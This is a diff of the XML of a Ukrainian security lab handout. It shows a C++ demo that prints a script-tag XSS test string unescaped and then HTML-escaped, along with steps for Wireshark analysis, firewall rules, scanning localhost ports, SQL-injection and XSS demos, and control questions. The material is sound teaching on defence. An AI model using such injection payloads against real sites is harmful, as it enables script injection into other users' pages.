+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    }</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    return out;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">}</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">int main() {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    const std::string name = "&lt;script&gt;alert(\"XSS\")&lt;/script&gt;";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::cout &lt;&lt; "Введено: " &lt;&lt; name &lt;&lt; "\n\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::cout &lt;&lt; "Без захисту:\n  &lt;p&gt;Привіт, " &lt;&lt; name &lt;&lt; "&lt;/p&gt;\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::cout &lt;&lt; "  -&gt; браузер виконає скрипт\n\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::cout &lt;&lt; "З екрануванням:\n  &lt;p&gt;Привіт, " &lt;&lt; htmlEscape(name) &lt;&lt; "&lt;/p&gt;\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    std::cout &lt;&lt; "  -&gt; браузер покаже скрипт як звичайний текст\n";</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    return 0;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">}</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5383,19 +5696,10 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="1006"/>
-        </w:numPr>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">Сканування портів:</w:t>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Результат роботи програми:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5443,25 +5747,73 @@
               <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
             </w:pPr>
             <w:r>
-              <w:t xml:space="preserve">- Визначити відкриті порти на localhost</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">- Ідентифікувати процеси, що прослуховують порти</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">- Записати результати</w:t>
+              <w:t xml:space="preserve">Введено: &lt;script&gt;alert("XSS")&lt;/script&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Без захисту:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">  &lt;p&gt;Привіт, &lt;script&gt;alert("XSS")&lt;/script&gt;&lt;/p&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">  -&gt; браузер виконає скрипт</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">З екрануванням:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">  &lt;p&gt;Привіт, &amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&lt;/p&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">  -&gt; браузер покаже скрипт як звичайний текст</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5476,150 +5828,146 @@
         </w:rPr>
       </w:pPr>
     </w:p>
+    <w:bookmarkEnd w:id="26"/>
+    <w:bookmarkEnd w:id="27"/>
+    <w:bookmarkEnd w:id="28"/>
+    <w:bookmarkStart w:id="29" w:name="порядок-виконання-роботи"/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Порядок виконання роботи</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1004"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Отримати в викладача номер індивідуального варіанта.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1004"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Аналіз мережевого трафіку: запустити Wireshark на основному інтерфейсі, відвідати кілька сайтів через HTTP і HTTPS, знайти HTTP-запити й порівняти, що видно у відкритому та зашифрованому трафіку; застосувати фільтри з таблиці.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1004"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Налаштування брандмауера: зберегти поточні правила, створити правило блокування й правило дозволу для портів свого варіанта, перевірити їхню дію, після чого видалити тестові правила й відновити початковий стан.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1004"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Сканування портів: визначити відкриті порти на</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="VerbatimChar"/>
+        </w:rPr>
+        <w:t xml:space="preserve">127.0.0.1</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">командами ОС і власним сканером, зіставити їх із процесами, що їх прослуховують.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1004"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Захист веб-застосунку: запустити демонстрацію SQL-ін’єкції та XSS, показати успішну атаку на вразливий варіант і її блокування безпечним.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1004"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Виконати індивідуальне завдання згідно з варіантом.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1004"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Оформити звіт та зробити висновок.</w:t>
+      </w:r>
+    </w:p>
+    <w:bookmarkEnd w:id="29"/>
+    <w:bookmarkStart w:id="30" w:name="вимоги-до-звіту"/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Вимоги до звіту</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="FirstParagraph"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Звіт оформлюється на бланку встановленого зразка і має містити:</w:t>
+      </w:r>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="1007"/>
+          <w:numId w:val="1005"/>
         </w:numPr>
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">Захист веб-застосунку:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
-        <w:rPr>
-          <w:sz w:val="4"/>
-          <w:szCs w:val="4"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblStyle w:val="SourceCodeTable"/>
-        <w:tblW w:type="dxa" w:w="9637"/>
-        <w:tblInd w:w="0" w:type="dxa"/>
-        <w:tblBorders>
-          <w:top w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
-          <w:left w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
-          <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
-          <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
-        </w:tblBorders>
-        <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
-        <w:tblLayout w:type="fixed"/>
-        <w:tblCellMar>
-          <w:top w:type="dxa" w:w="113"/>
-          <w:left w:type="dxa" w:w="113"/>
-          <w:bottom w:type="dxa" w:w="113"/>
-          <w:right w:type="dxa" w:w="113"/>
-        </w:tblCellMar>
-        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="9637"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="9637"/>
-            <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">- Запустити демонстраційний код SQL-ін'єкції</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">- Продемонструвати успішну атаку на вразливий код</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">- Продемонструвати блокування атаки безпечним кодом</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="SourceCode"/>
-              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:t xml:space="preserve">- Повторити для XSS</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
-        <w:rPr>
-          <w:sz w:val="4"/>
-          <w:szCs w:val="4"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="1008"/>
-        </w:numPr>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Виконати індивідуальне завдання згідно з варіантом.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="1008"/>
-        </w:numPr>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Оформити звіт та зробити висновок.</w:t>
-      </w:r>
-    </w:p>
-    <w:bookmarkEnd w:id="28"/>
-    <w:bookmarkStart w:id="29" w:name="вимоги-до-звіту"/>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Вимоги до звіту</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="FirstParagraph"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Звіт оформлюється на бланку встановленого зразка і має містити:</w:t>
+        <w:t xml:space="preserve">тему, мету та обладнання;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5627,12 +5975,12 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="1009"/>
+          <w:numId w:val="1005"/>
         </w:numPr>
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">тему, мету та обладнання;</w:t>
+        <w:t xml:space="preserve">постановку задачі за індивідуальним варіантом;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5640,12 +5988,12 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="1009"/>
+          <w:numId w:val="1005"/>
         </w:numPr>
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">постановку задачі за індивідуальним варіантом;</w:t>
+        <w:t xml:space="preserve">знімки екрана Wireshark з фільтрами;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5653,12 +6001,12 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="1009"/>
+          <w:numId w:val="1005"/>
         </w:numPr>
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">знімки екрана Wireshark з фільтрами;</w:t>
+        <w:t xml:space="preserve">команди та результати налаштування брандмауера;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5666,12 +6014,12 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="1009"/>
+          <w:numId w:val="1005"/>
         </w:numPr>
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">команди та результати налаштування брандмауера;</w:t>
+        <w:t xml:space="preserve">результати сканування портів з ідентифікацією сервісів;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5679,12 +6027,12 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="1009"/>
+          <w:numId w:val="1005"/>
         </w:numPr>
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">результати сканування портів з ідентифікацією сервісів;</w:t>
+        <w:t xml:space="preserve">код та результати демонстрації SQL-ін’єкції та XSS;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5692,12 +6040,12 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="1009"/>
+          <w:numId w:val="1005"/>
         </w:numPr>
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">код та результати демонстрації SQL-ін’єкції та XSS;</w:t>
+        <w:t xml:space="preserve">результат виконання індивідуального завдання;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5705,29 +6053,16 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="1009"/>
+          <w:numId w:val="1005"/>
         </w:numPr>
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">результат виконання індивідуального завдання;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Compact"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="1009"/>
-        </w:numPr>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
         <w:t xml:space="preserve">висновок про методи захисту від мережевих атак.</w:t>
       </w:r>
     </w:p>
-    <w:bookmarkEnd w:id="29"/>
-    <w:bookmarkStart w:id="30" w:name="варіанти-індивідуальних-завдань"/>
+    <w:bookmarkEnd w:id="30"/>
+    <w:bookmarkStart w:id="31" w:name="варіанти-індивідуальних-завдань"/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
@@ -6719,8 +7054,8 @@
         </w:tc>
       </w:tr>
     </w:tbl>
-    <w:bookmarkEnd w:id="30"/>
-    <w:bookmarkStart w:id="34" w:name="контрольні-запитання"/>
+    <w:bookmarkEnd w:id="31"/>
+    <w:bookmarkStart w:id="35" w:name="контрольні-запитання"/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
@@ -6737,7 +7072,7 @@
         <w:t xml:space="preserve">Запитання згруповано за рівнями навчальних досягнень. Для позитивної оцінки студент має відповісти на запитання середнього рівня, оцінка «добре» потребує відповідей достатнього рівня, оцінка «відмінно» — високого.</w:t>
       </w:r>
     </w:p>
-    <w:bookmarkStart w:id="31" w:name="середній-рівень-репродуктивний"/>
+    <w:bookmarkStart w:id="32" w:name="середній-рівень-репродуктивний"/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
@@ -6751,7 +7086,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="1010"/>
+          <w:numId w:val="1006"/>
         </w:numPr>
         <w:jc w:val="both"/>
       </w:pPr>
@@ -6764,7 +7099,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="1010"/>
+          <w:numId w:val="1006"/>
         </w:numPr>
         <w:jc w:val="both"/>
       </w:pPr>
@@ -6777,7 +7112,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="1010"/>
+          <w:numId w:val="1006"/>
         </w:numPr>
         <w:jc w:val="both"/>
       </w:pPr>
@@ -6790,7 +7125,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="1010"/>
+          <w:numId w:val="1006"/>
         </w:numPr>
         <w:jc w:val="both"/>
       </w:pPr>
@@ -6803,7 +7138,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="1010"/>
+          <w:numId w:val="1006"/>
         </w:numPr>
         <w:jc w:val="both"/>
       </w:pPr>
@@ -6816,7 +7151,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="1010"/>
+          <w:numId w:val="1006"/>
         </w:numPr>
         <w:jc w:val="both"/>
       </w:pPr>
@@ -6829,7 +7164,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="1010"/>
+          <w:numId w:val="1006"/>
         </w:numPr>
         <w:jc w:val="both"/>
       </w:pPr>
@@ -6842,7 +7177,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="1010"/>
+          <w:numId w:val="1006"/>
         </w:numPr>
         <w:jc w:val="both"/>
       </w:pPr>
@@ -6850,8 +7185,8 @@
         <w:t xml:space="preserve">Що таке Content Security Policy?</w:t>
       </w:r>
     </w:p>
-    <w:bookmarkEnd w:id="31"/>
-    <w:bookmarkStart w:id="32" w:name="Xf8a59b0220f3a7cb520922cfcf2989f7f66f7c3"/>
+    <w:bookmarkEnd w:id="32"/>
+    <w:bookmarkStart w:id="33" w:name="Xf8a59b0220f3a7cb520922cfcf2989f7f66f7c3"/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
@@ -6865,7 +7200,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="1011"/>
+          <w:numId w:val="1007"/>
         </w:numPr>
         <w:jc w:val="both"/>
       </w:pPr>
@@ -6878,7 +7213,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="1011"/>
+          <w:numId w:val="1007"/>
         </w:numPr>
         <w:jc w:val="both"/>
       </w:pPr>
@@ -6891,7 +7226,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="1011"/>
+          <w:numId w:val="1007"/>
         </w:numPr>
         <w:jc w:val="both"/>
       </w:pPr>
@@ -6904,7 +7239,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="1011"/>
+          <w:numId w:val="1007"/>
         </w:numPr>
         <w:jc w:val="both"/>
       </w:pPr>
@@ -6917,7 +7252,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="1011"/>
+          <w:numId w:val="1007"/>
         </w:numPr>
         <w:jc w:val="both"/>
       </w:pPr>
@@ -6930,7 +7265,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="1011"/>
+          <w:numId w:val="1007"/>
         </w:numPr>
         <w:jc w:val="both"/>
       </w:pPr>
@@ -6943,7 +7278,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="1011"/>
+          <w:numId w:val="1007"/>
         </w:numPr>
         <w:jc w:val="both"/>
       </w:pPr>
@@ -6956,7 +7291,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="1011"/>
+          <w:numId w:val="1007"/>
         </w:numPr>
         <w:jc w:val="both"/>
       </w:pPr>
@@ -6964,8 +7299,8 @@
         <w:t xml:space="preserve">Як CSP обмежує наслідки успішної XSS-атаки?</w:t>
       </w:r>
     </w:p>
-    <w:bookmarkEnd w:id="32"/>
-    <w:bookmarkStart w:id="33" w:name="високий-рівень-творчий"/>
+    <w:bookmarkEnd w:id="33"/>
+    <w:bookmarkStart w:id="34" w:name="високий-рівень-творчий"/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading3"/>
@@ -6979,7 +7314,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="1012"/>
+          <w:numId w:val="1008"/>
         </w:numPr>
         <w:jc w:val="both"/>
       </w:pPr>
@@ -6992,7 +7327,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="1012"/>
+          <w:numId w:val="1008"/>
         </w:numPr>
         <w:jc w:val="both"/>
       </w:pPr>
@@ -7005,7 +7340,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="1012"/>
+          <w:numId w:val="1008"/>
         </w:numPr>
         <w:jc w:val="both"/>
       </w:pPr>
@@ -7018,7 +7353,7 @@
         <w:pStyle w:val="Compact"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="1012"/>
+          <w:numId w:val="1008"/>
         </w:numPr>
         <w:jc w:val="both"/>
       </w:pPr>
@@ -7026,8 +7361,8 @@
         <w:t xml:space="preserve">Сформулюйте, чому більшість успішних атак використовує не технічні вразливості, а помилки конфігурації та людський фактор. Проілюструйте прикладами з роботи.</w:t>
       </w:r>
     </w:p>
-    <w:bookmarkEnd w:id="33"/>
     <w:bookmarkEnd w:id="34"/>
+    <w:bookmarkEnd w:id="35"/>
     <w:sectPr>
       <w:pgSz w:h="16838" w:orient="portrait" w:w="11906"/>
       <w:pgMar w:bottom="1134" w:footer="708" w:gutter="0" w:header="708" w:left="1418" w:right="851" w:top="1134"/>
@@ -7307,346 +7642,6 @@
     </w:lvl>
     <w:lvl w:ilvl="8">
       <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%9."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="5670" w:hanging="425"/>
-      </w:pPr>
-    </w:lvl>
-  </w:abstractNum>
-  <w:abstractNum w:abstractNumId="99413">
-    <w:nsid w:val="00A99413"/>
-    <w:multiLevelType w:val="multilevel"/>
-    <w:lvl w:ilvl="0">
-      <w:start w:val="3"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%1."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="1134" w:hanging="425"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="1">
-      <w:start w:val="3"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%2."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="1701" w:hanging="425"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="2">
-      <w:start w:val="3"/>
-      <w:numFmt w:val="decimal"/>
